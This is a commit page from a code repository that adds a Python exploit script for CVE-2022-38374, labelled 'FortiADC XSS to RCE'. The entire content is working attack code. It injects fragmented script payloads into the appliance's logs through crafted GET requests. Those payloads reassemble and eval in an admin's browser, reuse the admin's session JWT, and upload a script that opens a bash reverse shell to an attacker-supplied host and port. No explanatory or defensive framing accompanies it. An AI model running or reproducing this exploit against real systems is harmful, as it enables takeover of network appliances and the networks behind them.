STRLCPY/CVE-2022-38374

Add files via upload
zrt committed with GitHub 1 year ago

2b94b342

1 parent d1959691

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

exploit.py

1	+	#!/usr/bin/python3
2	+
3	+	import math
4	+	import time
5	+	import socket
6	+	import base64
7	+	import argparse
8	+
9	+
10	+
11	+	def encode_all(string):
12	+	return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
13	+
14	+	def genPayload(host, port):
15	+	data = '-----------------------------7020473452044903480265093380%0D%0AContent-Disposition: form-data; name="pyfile";filename="test.txt"%0D%0AContent-Type: text/plain%0D%0Aimport os; os.system("bash -i >& /dev/tcp/' + host + '/' + port + '0>&1")%0D%0A-----------------------------7020473452044903480265093380--'
16	+
17	+	script_url = '/ui/#navigate/Config/system/aws_scripting'
18	+	payload='''var xhr = new XMLHttpRequest();
19	+	xhr.open("POST","/ui/#navigate/Config/system/aws_scripting",true);
20	+	xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]);
21	+	xhr.setRequestHeader("Content-Type","multipart/form-data;boundary=---------------------------7020473452044903480265093380");
22	+	xhr.send('%s');xhr.open("GET","/api/system_aws_scripting/py_script_log?vdom=root&traffic_group=default",true);xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]);xhr.send();''' % data
23	+
24	+	payload=encode_all(payload)
25	+
26	+	chunks = [payload[i:i+400] for i in range(0, len(payload), 400)]
27	+
28	+	# We need to store chunks in a variable reading each row and then decode and eval it
29	+	payload=["p='';for(s=1;s<%s;s++);p+=$('table').dataTable().api().data()[s]['http_qry'];f=eval(decodeURIComponent(p))" % (len(chunks)+1)]
30	+	for i in chunks:
31	+	payload.append("%s" % i)
32	+	return payload
33	+
34	+	uri=['','','','','','','','','','']
35	+
36	+	uri+=['<script>e(e(s))', \
37	+	'<script>s=e(v)', \
38	+	'<script>u=$(d)', \
39	+	'<script>v+=d+c', \
40	+	'<script>c="()"', \
41	+	'<script>v="u.t"', \
42	+	'<script>d="ext"', \
43	+	'<ext>y"]', \
44	+	'<ext>]["http_qr', \
45	+	'<ext>t.data()[0']
46	+
47	+	uri+=['<script>e(e(y))', \
48	+	'<script>e(e(z))', \
49	+	'<script>w=$(d)', \
50	+	'<script>z+=d+c', \
51	+	'<script>c="()"', \
52	+	'<script>z="w.t"', \
53	+	'<script>d="ext"', \
54	+	'<ext>le().api()', \
55	+	'<ext>").dataTab', \
56	+	'<ext>t=$("table']
57	+
58	+	uri+=['<script>e(e(y))', \
59	+	'<script>e=eval', \
60	+	'<script>x=$(d)', \
61	+	'<script>y+=d+c', \
62	+	'<script>c="()"', \
63	+	'<script>y="x.t"', \
64	+	'<script>d="ext"', \
65	+	'<ext>).click())', \
66	+	'<ext>>$(".next"', \
67	+	'<ext>_.delay(_=']
68	+
69	+	parser = argparse.ArgumentParser(description='FortiADC XSS to RCE')
70	+	parser.add_argument('thost', metavar='thost', help='Target host')
71	+	parser.add_argument('tport', metavar='tport', help='Target port')
72	+	parser.add_argument('rhost', metavar='rhost', help='Reverse shell host')
73	+	parser.add_argument('rport', metavar='rport', help='Reverse shell port')
74	+	args = parser.parse_args()
75	+	count=0
76	+	payload = genPayload(args.rhost, args.rport)
77	+	temp = len(payload)-1
78	+
79	+	for i in uri:
80	+	if (count>=13) and (temp>=0):
81	+	data = "GET %s?%s\r\n\r\n" % (i,payload[temp])
82	+	temp-=1
83	+	time.sleep(0.1)
84	+	else:
85	+	data = "GET %s?%s\r\n\r\n" % (i,count)
86	+	time.sleep(0.1)
87	+
88	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
89	+	s.connect((args.thost, int(args.tport)))
90	+	s.send(str.encode(data))
91	+	s.close()
92	+	count+=1
93	+

Add files via upload